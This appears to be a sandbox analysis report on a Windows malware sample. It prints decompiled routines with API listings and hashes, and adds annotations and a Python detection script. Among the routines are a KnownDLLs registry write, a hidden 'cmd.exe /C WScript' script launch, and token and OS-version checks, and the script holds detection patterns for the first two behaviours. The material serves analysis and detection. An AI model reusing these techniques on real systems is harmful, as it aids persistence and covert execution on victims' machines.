                                                                                                                                          • Instruction ID: 663560f153661f58489f41854f68c215dbd6861c452647dabd8b659e9ddec512
                                                                                                                                          • Opcode Fuzzy Hash: f26b90b78254076905d6d2fbb5c08ebbfb30092b78da21401849fee9cabb9fdf
                                                                                                                                          • Instruction Fuzzy Hash: C4314F71741714BBEB309F95DC41F9B7BA8EB05B11F100065FB04AB2D1D6B5AD008FA8
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                          			E004082B0(intOrPtr _a4) {
                                                                                                                                          				void* _v8;
                                                                                                                                          				long _v12;
                                                                                                                                          				void* _t20;
                                                                                                                                          				void* _t27;
                                                                                                                                          				void* _t34;
                                                                                                                                          				void* _t37;
                                                                                                                                          				void* _t38;
                                                                                                                                          
                                                                                                                                          				_v8 = 0;
                                                                                                                                          				_v12 = 0;
                                                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
                                                                                                                                          					L4:
                                                                                                                                          					return 0;
                                                                                                                                          				} else {
                                                                                                                                          					if(GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
                                                                                                                                          						_t20 = E004015E0(_v12);
                                                                                                                                          						_t38 = _t37 + 4;
                                                                                                                                          						_t34 = _t20;
                                                                                                                                          						if(GetTokenInformation(_v8, 1, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
                                                                                                                                          							_push(_t34);
                                                                                                                                          							goto L8;
                                                                                                                                          						} else {
                                                                                                                                          							_t27 = E00407AA0( *_t34, _a4);
                                                                                                                                          							_t38 = _t38 + 8;
                                                                                                                                          							_push(_t34);
                                                                                                                                          							if(_t27 == 0) {
                                                                                                                                          								L8:
                                                                                                                                          								E00401510();
                                                                                                                                          								CloseHandle(_v8);
                                                                                                                                          								return 0;
                                                                                                                                          							} else {
                                                                                                                                          								E00401510();
                                                                                                                                          								CloseHandle(_v8);
                                                                                                                                          								return 1;
                                                                                                                                          							}
                                                                                                                                          						}
                                                                                                                                          					} else {
                                                                                                                                          						CloseHandle(_v8);
                                                                                                                                          						goto L4;
                                                                                                                                          					}
                                                                                                                                          				}
			}

                                                                                                                                          0x004082b9
                                                                                                                                          0x004082c3
                                                                                                                                          0x004082d9
                                                                                                                                          0x00408306
                                                                                                                                          0x0040830b
                                                                                                                                          0x004082db
                                                                                                                                          0x004082f0
                                                                                                                                          0x00408310
                                                                                                                                          0x00408315
                                                                                                                                          0x00408318
                                                                                                                                          0x0040832f
                                                                                                                                          0x0040833d
                                                                                                                                          0x00000000
                                                                                                                                          0x00408356
                                                                                                                                          0x0040835b
                                                                                                                                          0x00408360
                                                                                                                                          0x00408363
                                                                                                                                          0x00408366
                                                                                                                                          0x0040833e
                                                                                                                                          0x0040833e
                                                                                                                                          0x00408349
                                                                                                                                          0x00408355
                                                                                                                                          0x00408368
                                                                                                                                          0x00408368
                                                                                                                                          0x00408373
                                                                                                                                          0x00408382
                                                                                                                                          0x00408382
                                                                                                                                          0x00408366
                                                                                                                                          0x004082fd
                                                                                                                                          0x00408300
                                                                                                                                          0x00000000
                                                                                                                                          0x00408300
                                                                                                                                          0x004082f0

                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32(00000008,00000400), ref: 004082CA
                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004082D1
                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 004082E8
                                                                                                                                          • GetLastError.KERNEL32 ref: 004082F2
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408300
                                                                                                                                          • GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 00408327
                                                                                                                                          • IsValidSid.ADVAPI32(00000000), ref: 00408333
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408349
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00408373
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2832165296-0
                                                                                                                                          • Opcode ID: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
                                                                                                                                          • Instruction ID: 6c80d8c1505064fb5d23a14c91f2f6bbea28928c87bc453829ba29e9ce75709a
                                                                                                                                          • Opcode Fuzzy Hash: b5a0d24f3340db2a52b6e5b72ce1261ad8fa07ef55d193fc80752f6946e3dc09
                                                                                                                                          • Instruction Fuzzy Hash: F5215E31A00108FBEF116FA0EE0AB9E7FB9EF54745F1000B5F945F51A1EB768E109A99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                          			E00408390(long* _a4) {
                                                                                                                                          				long _v8;
                                                                                                                                          				struct _PROCESS_INFORMATION _v24;
                                                                                                                                          				struct _STARTUPINFOW _v92;
                                                                                                                                          				void* _t35;
                                                                                                                                          
                                                                                                                                          				_t35 = OpenProcess(0x1000, 0,  *_a4);
                                                                                                                                          				if(_t35 == 0) {
                                                                                                                                          					ExitThread(0);
                                                                                                                                          				}
                                                                                                                                          				while(1) {
                                                                                                                                          					_v8 = 0;
                                                                                                                                          					if(GetExitCodeProcess(_t35,  &_v8) == 0 || (0 | _v8 == 0x00000103) == 0) {
                                                                                                                                          						break;
                                                                                                                                          					}
                                                                                                                                          					Sleep(0x7d0);
                                                                                                                                          				}
                                                                                                                                          				CloseHandle(_t35);
                                                                                                                                          				E00401BB0( &_v92, 0, 0x44);
                                                                                                                                          				asm("xorps xmm0, xmm0");
                                                                                                                                          				asm("movups [ebp-0x14], xmm0");
                                                                                                                                          				CreateProcessW( &(_a4[1]), 0, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                                                                                                                          				CloseHandle(_v24.hThread);
                                                                                                                                          				CloseHandle(_v24);
                                                                                                                                          				ExitThread(_v24.dwProcessId);
			}

                                                                                                                                          0x004083ab
                                                                                                                                          0x004083af
                                                                                                                                          0x00408447
                                                                                                                                          0x00408447
                                                                                                                                          0x004083c1
                                                                                                                                          0x004083c4
                                                                                                                                          0x004083d1
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x004083e8
                                                                                                                                          0x004083e8
                                                                                                                                          0x004083f3
                                                                                                                                          0x004083fd
                                                                                                                                          0x00408408
                                                                                                                                          0x0040840b
                                                                                                                                          0x0040842c
                                                                                                                                          0x00408435
                                                                                                                                          0x0040843a
                                                                                                                                          0x0040843f

                                                                                                                                          APIs
                                                                                                                                          • OpenProcess.KERNEL32(00001000,00000000,?), ref: 004083A5
                                                                                                                                          • GetExitCodeProcess.KERNEL32 ref: 004083CD
                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 004083E8
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004083F3
                                                                                                                                          • CreateProcessW.KERNEL32 ref: 0040842C
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00408435
                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040843A
                                                                                                                                          • ExitThread.KERNEL32 ref: 0040843F
                                                                                                                                          • ExitThread.KERNEL32 ref: 00408447
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseExitHandleProcess$Thread$CodeCreateOpenSleep
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1465093181-0
                                                                                                                                          • Opcode ID: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
                                                                                                                                          • Instruction ID: 538b4140d65d2fd151ab259c2702cab8e281b3ea1c27d0cfeab488a6800ad3c5
                                                                                                                                          • Opcode Fuzzy Hash: fbe44c1088de2dd18943f42bff4359acb9e52e68f53b43e8eab5e7423105ac84
                                                                                                                                          • Instruction Fuzzy Hash: 64114971A40319BBEB11DBA4DE45F9F7B78AF04741F140025B604BA1D1DBB4AE40CB99
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// Registry tampering helper: opens HKLM\SYSTEM\...\Session Manager\KnownDLLs with
			// KEY_ALL_ACCESS (0xF003F) and writes the REG_SZ (type 1) value "ntdll" = "ntdll.dll".
			// Writing under HKLM needs an elevated token, so this only succeeds when the sample runs
			// as administrator. The byte count passed to RegSetValueExW (2 + 2*len) is the wide-string
			// length plus its terminating NUL, so E00401B40 is presumably a wcslen-style routine.
			E00402DD0(void* __ecx) {
				void* _v8;   // HKEY filled in by RegOpenKeyExW
				long _t8;    // LSTATUS

				_t1 =  &_v8; // 0x402f21
				_v8 = 0;
				_t8 = RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs", 0, 0xf003f, _t1);   // 0x80000002 == HKEY_LOCAL_MACHINE
				if(_t8 == 0) {
					RegSetValueExW(_v8, L"ntdll", 0, 1, L"ntdll.dll", 2 + E00401B40(L"ntdll.dll") * 2);   // 1 == REG_SZ
					return RegCloseKey(_v8);
				}
				return _t8;   // nonzero LSTATUS: key could not be opened (e.g. not elevated)
			}





Statement addresses: 0x00402dd4, 0x00402dd7, 0x00402df0, 0x00402df8, 0x00402e20, 0x00000000, 0x00402e29, 0x00402e32

                                                                                                                                          APIs
                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs,00000000,000F003F,!/@), ref: 00402DF0
                                                                                                                                          • RegSetValueExW.ADVAPI32(00000000,ntdll,00000000,00000001,ntdll.dll,00000000), ref: 00402E20
                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402E29
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseOpenValue
                                                                                                                                          • String ID: !/@$SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs$ntdll$ntdll.dll
                                                                                                                                          • API String ID: 779948276-871150387
                                                                                                                                          • Opcode ID: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
                                                                                                                                          • Instruction ID: 484440f86f87c03b30c3bb65dbd638c5ca07b71e5d6230add0e59dd50d7b01eb
                                                                                                                                          • Opcode Fuzzy Hash: 2ac2e1f2ae53ea3f65214954049f4d68d98ab157eba3ad612de933165087b6f9
                                                                                                                                          • Instruction Fuzzy Hash: E6F0A071680208BBEB119B91DE0BFAA7678E744B04F200076FA01B11E2E6B56E14D648
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 79%
			// Dropper thread routine (it never returns; both paths end in ExitThread). Builds the
			// command line  cmd.exe /C WScript "<script path>"  and launches it with no visible
			// window, then reports the child PID as the thread exit code. The script path is read at
			// _a4 + 0x80 (the decompiler renders the constant as _a4 - 0xffffff80); E00401A00 and
			// E00401970 appear to be wide-string copy/append helpers.
			E00406CA0(intOrPtr _a4) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v88;
				short _v1128;   // wide-char command-line buffer
				long _t25;

				E00401BB0( &_v88, 0, 0x44);            // memset-style zeroing; 0x44 == sizeof(STARTUPINFOW)
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x10], xmm0");         // zero the 16-byte PROCESS_INFORMATION
				E00401A00( &_v1128, L"cmd.exe /C WScript \"");
				E00401970( &_v1128, _a4 - 0xffffff80);  // append the script path found at _a4 + 0x80
				E00401970( &_v1128, "\"");
				_t25 = CreateProcessW(0,  &_v1128, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);   // 0x8000000 == CREATE_NO_WINDOW
				if(_t25 != 0) {
					CloseHandle(_v20.hThread);
					CloseHandle(_v20);                 // first member of PROCESS_INFORMATION: hProcess
					ExitThread(_v20.dwProcessId);     // child PID becomes the thread exit code
				}
				ExitThread(_t25);                     // CreateProcessW failed: exit code 0
			}







Statement addresses: 0x00406cb1, 0x00406cbc, 0x00406cc5, 0x00406cc9, 0x00406cdc, 0x00406ced, 0x00406d15, 0x00406d1d, 0x00406d29, 0x00406d32, 0x00406d3b, 0x00406d3b, 0x00406d20

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseExitHandleThread$CreateProcess
                                                                                                                                          • String ID: cmd.exe /C WScript "
                                                                                                                                          • API String ID: 3397019416-3599441821
                                                                                                                                          • Opcode ID: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
                                                                                                                                          • Instruction ID: eef6df8135acf94fe22a1234d31cd8a2743a9bcf06af6411463f708c953a90e9
                                                                                                                                          • Opcode Fuzzy Hash: 684bdaeb806f3df040d5c7cfd2e69662539794e42a811bb9b384c79524ea307f
                                                                                                                                          • Instruction Fuzzy Hash: 05111BB1A40319BAEB10ABE0CE4AF9E777CAF15700F500176B305B50E2E779AA54CB5D
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%
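The two routines above, the KnownDLLs registry write and the hidden `cmd.exe /C WScript "<path>"` launch, are both visible in host telemetry. The following is an added example, not code from the sandbox report or from the sample, showing how a Sysmon-style event feed could be triaged for exactly those two behaviours: a registry SetValue (Event ID 13) whose target sits under KnownDLLs, and a process creation (Event ID 1) whose command line runs WScript or CScript through `cmd /c`. The events, file paths and field names below are constructed for illustration and do not come from the report.

```python
"""Added example (not part of the sandbox report or the sample): minimal
Sysmon-style event triage for the two behaviours decompiled above,
a registry write under KnownDLLs (Event ID 13) and a cmd.exe /C WScript
launch (Event ID 1). All events below are constructed, not real telemetry."""
import json
import re

KNOWNDLLS = r"control\session manager\knowndlls"
# cmd[.exe] /c [w|c]script[.exe] ..., case-insensitive; tolerates a quoted script host.
WSCRIPT_VIA_CMD = re.compile(r'cmd(\.exe)?\s+/c\s+"?[wc]script(\.exe)?\b', re.IGNORECASE)

# Constructed sample events (newline-delimited JSON with Sysmon field names; hypothetical paths).
SAMPLE_EVENTS = [
    json.dumps({"EventID": 13, "EventType": "SetValue",
                "Image": r"C:\Users\victim\AppData\Local\Temp\P7Oa6i5muL.exe",
                "TargetObject": r"HKLM\System\CurrentControlSet\Control\Session Manager\KnownDLLs\ntdll",
                "Details": "ntdll.dll"}),
    json.dumps({"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
                "ParentImage": r"C:\Users\victim\AppData\Local\Temp\P7Oa6i5muL.exe",
                "CommandLine": r'cmd.exe /C WScript "C:\Users\victim\AppData\Roaming\update.vbs"'}),
    json.dumps({"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
                "ParentImage": r"C:\Windows\explorer.exe",
                "CommandLine": r"cmd.exe /C dir"}),
    json.dumps({"EventID": 13, "EventType": "SetValue",
                "Image": r"C:\Windows\System32\svchost.exe",
                "TargetObject": r"HKLM\System\CurrentControlSet\Services\BITS\Start",
                "Details": "DWORD (0x00000003)"}),
]


def classify(event):
    """Return a list of (rule, reason) tuples for one parsed event."""
    hits = []
    eid = event.get("EventID")
    if eid == 13:
        target = event.get("TargetObject", "")
        # Any SetValue under KnownDLLs is rare outside OS servicing; the sample writes ntdll = ntdll.dll there.
        if KNOWNDLLS in target.lower():
            hits.append(("knowndlls_write",
                         f"{event.get('Image')} set {target} = {event.get('Details')}"))
    elif eid == 1:
        cmdline = event.get("CommandLine", "")
        # cmd.exe used only to relay into a script host, as the decompiled thread routine does.
        if WSCRIPT_VIA_CMD.search(cmdline):
            hits.append(("wscript_via_cmd", f"{event.get('ParentImage')} -> {cmdline}"))
    return hits


def triage(lines):
    """Parse newline-delimited JSON events and return every rule hit; unparsable lines are skipped."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        findings.extend(classify(event))
    return findings


if __name__ == "__main__":
    for rule, reason in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {reason}")
```

Running it over the constructed feed reports the KnownDLLs write and the WScript launch and stays quiet on the benign `cmd.exe /C dir` and the BITS service-start change. In a real deployment the parent-image field is the useful pivot: the launching process here is the dropped executable itself, which is what separates this from an administrator running a logon script.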

C-Code - Quality: 58%
			// WoW64 check: resolves IsWow64Process at run time (via GetProcAddress rather than an
			// import, so the binary still loads on kernel32 builds that lack the export) and returns
			// the BOOL it reports for the process handle in _a4. Returns 0 both for "not WoW64" and
			// for any failure, so the caller cannot distinguish the two.
			E00408270(void* __ecx, char _a4) {
				char _v8;                     // receives the Wow64Process BOOL
				_Unknown_base(*)()* _t6;      // IsWow64Process function pointer
				void* _t8;

				_v8 = 0;
				_t6 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
				if(_t6 == 0) {
					L3:
					return _v8;
				} else {
					_t3 =  &_a4; // 0x403432
					_t8 =  *_t6( *_t3,  &_v8);   // IsWow64Process(hProcess, &_v8)
					if(_t8 != 0) {
						goto L3;
					} else {
						return _t8;              // call failed: 0
					}
				}
			}






Statement addresses: 0x0040827e, 0x0040828c, 0x00408294, 0x004082a7, 0x004082ad, 0x00408296, 0x0040829a, 0x0040829d, 0x004082a1, 0x00000000, 0x004082a6, 0x004082a6, 0x004082a6, 0x004082a1

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 0040828C
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: 24@$IsWow64Process$kernel32
                                                                                                                                          • API String ID: 1646373207-2506754407
                                                                                                                                          • Opcode ID: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
                                                                                                                                          • Instruction ID: 4e0a41bddc85eb87f205be8107a504d095728719a775a610ae93757d078e0763
                                                                                                                                          • Opcode Fuzzy Hash: 1784de0c5810e25c16468953f65073bf0f366bd13a04a3200ad938df08ff7324
                                                                                                                                          • Instruction Fuzzy Hash: 6CE04F71644309ABDB10DBD0DE09B6E77ACDF41345F1441EDB808A2290EA799E109659
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 100%
			// realloc-style wrapper over the process heap. Unlike CRT realloc, a failed HeapReAlloc
			// frees the original block (_a4) before returning 0, so callers must not touch _a4
			// after a 0 return.
			E004016A0(void* _a4, char _a8) {
				long _t5;
				long _t9;

				_t1 =  &_a8; // 0x404d23
				_t5 = HeapReAlloc(GetProcessHeap(), 0, _a4,  *_t1);   // _a8: new size in bytes
				_t9 = _t5;
				if(_t9 == 0) {
					HeapFree(GetProcessHeap(), _t5, _a4);            // _t5 is 0 here, i.e. dwFlags == 0
					return _t9;
				}
				return _t5;   // pointer to the (possibly moved) block
			}





Statement addresses: 0x004016a4, 0x004016b3, 0x004016b9, 0x004016bd, 0x004016ca, 0x00000000, 0x004016d0, 0x004016d4

                                                                                                                                          APIs
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,#M@,00000000,?,00404D23,00000000,00000000), ref: 004016AC
                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016B3
                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00404D23,00000000,00000000), ref: 004016C3
                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00404D23,00000000,00000000), ref: 004016CA
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$Process$AllocFree
                                                                                                                                          • String ID: #M@
                                                                                                                                          • API String ID: 756756679-4131475827
                                                                                                                                          • Opcode ID: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
                                                                                                                                          • Instruction ID: ff7cb380345909262a6c5e90b85417ef13bbf769aef9ce5e450cfb0b8575ba0d
                                                                                                                                          • Opcode Fuzzy Hash: fc61fb002829f62c73740841c358f8d549b4fe25cca030ce621caa1704b7f87d
                                                                                                                                          • Instruction Fuzzy Hash: 24E0EC36900214BBCF111FE5AD1CA9A3F2DEB087A2F048424FB0DE6221C635CD20DB98
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

C-Code - Quality: 58%
			// Fills a 0x11C-byte OSVERSIONINFOEXW at 0x5d2e0c through ntdll!RtlGetVersion,
			// resolved by name so there is no import to see and no compatibility-shim
			// version lie as with GetVersionEx. From major/minor/build it then stores an
			// OS index in *0x5d2e08 (XP=1, 7=2, 8=3, 8.1=4, Win10 builds 5..8, other=0).
			E00408CE0() {
				_Unknown_base(*)()* _t2;   // RtlGetVersion
				signed int _t3;            // dwMajorVersion, later dwBuildNumber
				signed int _t5;            // (major << 8) | minor
				void* _t9;

				 *0x5d2e0c = 0x11c;        // dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXW) = 284
				_t2 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
				if(_t2 != 0) {
					 *_t2(0x5d2e0c);
				}
				_t3 =  *0x5d2e10; // dwMajorVersion, 0xa in this run
				if(_t3 == 0) {
					L22:
					return _t3;            // version unknown: index left unchanged
				} else {
					_t5 = _t3 << 0x00000008 |  *0x5d2e14;   // major.minor packed, 0xa00 = 10.0
					_t9 = _t5 - 0x602;
					if(_t9 > 0) {
						if(_t5 == 0x603) {             // 6.3 = Windows 8.1
							 *0x5d2e08 = 4;
							return _t5;
						}
						if(_t5 == 0xa00) {             // 10.0: discriminate by build number
							_t3 =  *0x5d2e18; // dwBuildNumber, 0x42ee = 17134 (1803) in this run
							if(_t3 < 0x3fab) {         // 16299 = 1709
								if(_t3 < 0x3ad7) {     // 15063 = 1703
									if(_t3 < 0x3839) { // 14393 = 1607
										if(_t3 < 0x295a) { // 10586 = 1511; older builds: no index
											goto L22;
										} else {
											 *0x5d2e08 = 5;
											return _t3;
										}
									} else {
										 *0x5d2e08 = 6;
										return _t3;
									}
								} else {
									 *0x5d2e08 = 7;
									return _t3;
								}
							} else {
								 *0x5d2e08 = 8;
								return _t3;
							}
						} else {
							goto L12;              // > 6.2 but neither 6.3 nor 10.0
						}
					} else {
						if(_t9 == 0) {                 // 6.2 = Windows 8
							 *0x5d2e08 = 3;
							return _t5;
						} else {
							if(_t5 == 0x501) {         // 5.1 = Windows XP
								 *0x5d2e08 = 1;
								return _t5;
							} else {
								if(_t5 != 0x601) {     // anything else (5.0, 5.2, 6.0 ...)
									L12:
									 *0x5d2e08 = 0;
									return _t5;
								} else {               // 6.1 = Windows 7
									 *0x5d2e08 = 2;
									return _t5;
								}
							}
						}
					}
				}
			}







Addresses per C line: 0x00408cea, 0x00408cfb, 0x00408d03, 0x00408d0a, 0x00408d0a, 0x00408d0c, 0x00408d13, 0x00408dca, 0x00408dca, 0x00408d19, 0x00408d1c, 0x00408d22, 0x00408d27, 0x00408d5f, 0x00408dc0, 0x00000000, 0x00408dc0, 0x00408d66, 0x00408d73, 0x00408d7d, 0x00408d8f, 0x00408da1, 0x00408db3, 0x00000000, 0x00408db5, 0x00408db5, 0x00408dbf, 0x00408dbf, 0x00408da3, 0x00408da3, 0x00408dad, 0x00408dad, 0x00408d91, 0x00408d91, 0x00408d9b, 0x00408d9b, 0x00408d7f, 0x00408d7f, 0x00408d89, 0x00408d89, 0x00000000, 0x00000000, 0x00000000, 0x00408d29, 0x00408d29, 0x00408d4f, 0x00408d59, 0x00408d2b, 0x00408d30, 0x00408d44, 0x00408d4e, 0x00408d32, 0x00408d37, 0x00408d68, 0x00408d68, 0x00408d72, 0x00408d39, 0x00408d39, 0x00408d43, 0x00408d43, 0x00408d37, 0x00408d30, 0x00408d29, 0x00408d27

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlGetVersion,00408DD5,00403448), ref: 00408CF4
                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00408CFB
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                          • String ID: RtlGetVersion$ntdll.dll
                                                                                                                                          • API String ID: 1646373207-1489217083
                                                                                                                                          • Opcode ID: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
                                                                                                                                          • Instruction ID: 26c57fc426f1e3111cd77027b938fa7e90139beecd20d4fae7029aa442a0f424
                                                                                                                                          • Opcode Fuzzy Hash: 7285d3ab72aa9700bc586f94e958407b6898de8486acee8395e58182b358e7c1
                                                                                                                                          • Instruction Fuzzy Hash: 09110D751112008BEB25CF10DF9872A3799EB71700FA8497BD040E52E0CBFC85D9EA4A
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%
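As an added example (my code, not the report's or the sample's), the version gate above re-expressed in Python with the hex constants decoded into build numbers and release names, so the index the sample stores at *0x5d2e08 can be read off for any RtlGetVersion result. Thresholds and return values are taken from the decompiled code; the function names, the release labels in the comments and the assumed dwMinorVersion of the recorded run are my annotation.

```python
# Added example (mine, not from the sandbox report or the sample): the OS
# version gate decompiled as E00408CE0, rewritten with the hex constants
# decoded. Thresholds and return values come from the decompiled code; the
# names and the release labels in comments are my own annotation.

# Exact major.minor values, packed as (major << 8) | minor, that get a fixed index.
PACKED_VERSION_INDEX = {
    0x501: 1,   # 5.1  Windows XP
    0x601: 2,   # 6.1  Windows 7
    0x602: 3,   # 6.2  Windows 8
    0x603: 4,   # 6.3  Windows 8.1
}

# For 10.0 the index depends on dwBuildNumber; the first floor the build
# reaches wins (same order as the nested comparisons in the decompile).
WIN10_BUILD_FLOORS = [
    (0x3FAB, 8),  # 16299: 1709 (RS3) and anything newer, incl. Windows 11
    (0x3AD7, 7),  # 15063: 1703 (RS2)
    (0x3839, 6),  # 14393: 1607 (RS1)
    (0x295A, 5),  # 10586: 1511 (TH2)
]


def os_index(major: int, minor: int, build: int):
    """Return the value E00408CE0 writes to *0x5d2e08, or None where the
    decompiled function returns without touching it (RtlGetVersion failed
    and left dwMajorVersion at 0, or a 10.0 build older than 10586)."""
    if major == 0:
        return None
    packed = (major << 8) | minor
    if packed in PACKED_VERSION_INDEX:
        return PACKED_VERSION_INDEX[packed]
    if packed == 0xA00:
        for floor, idx in WIN10_BUILD_FLOORS:
            if build >= floor:
                return idx
        return None
    return 0   # every other version (5.0, 5.2, 6.0, ...) -> 0


def recorded_run():
    """The run the report captured: dwMajorVersion 0xa and dwBuildNumber
    0x42ee (17134, Windows 10 1803). dwMinorVersion is not shown in the dump
    and is assumed to be 0, as it is for every Windows 10 release."""
    return os_index(0xA, 0, 0x42EE)
```

Note that a Windows 10 build below 10586 and a failed RtlGetVersion both leave the index untouched rather than setting 0, which is the only way to distinguish "unknown" from "unsupported" when reading the global later.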

C-Code - Quality: 100%
			// Return a module handle for the named DLL, mapping it first if it is not
			// already loaded. Helper for the sample's by-name API resolution; the
			// APIs list below shows the caller at 0x00402B26.
			E00408B00(CHAR* _a4) {
				struct HINSTANCE__* _t3;
				CHAR** _t1;

				_t1 =  &_a4; // 0x402b26
				_t3 = GetModuleHandleA( *_t1);
				if(_t3 == 0) {
					return LoadLibraryA(_a4);
				}
				return _t3;
			}




Addresses per C line: 0x00408b03, 0x00408b06, 0x00408b0e, 0x00000000, 0x00408b13, 0x00408b1a

                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(&+@,?,00402B26,?), ref: 00408B06
                                                                                                                                          • LoadLibraryA.KERNEL32(00000000,?,00402B26,?), ref: 00408B13
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.461137004.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                          Yara matches
                                                                                                                                          Similarity
                                                                                                                                          • API ID: HandleLibraryLoadModule
                                                                                                                                          • String ID: &+@
                                                                                                                                          • API String ID: 4133054770-3274530745
                                                                                                                                          • Opcode ID: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
                                                                                                                                          • Instruction ID: 6061ff5d45b2c9477c6e6c8a5bdf30d78efc3d99e478dc08a0e6e8702b224e8b
                                                                                                                                          • Opcode Fuzzy Hash: a2c9844b3c19bb96194046df9ca848ceace1c6f359e83cde6a5973935ba7ed72
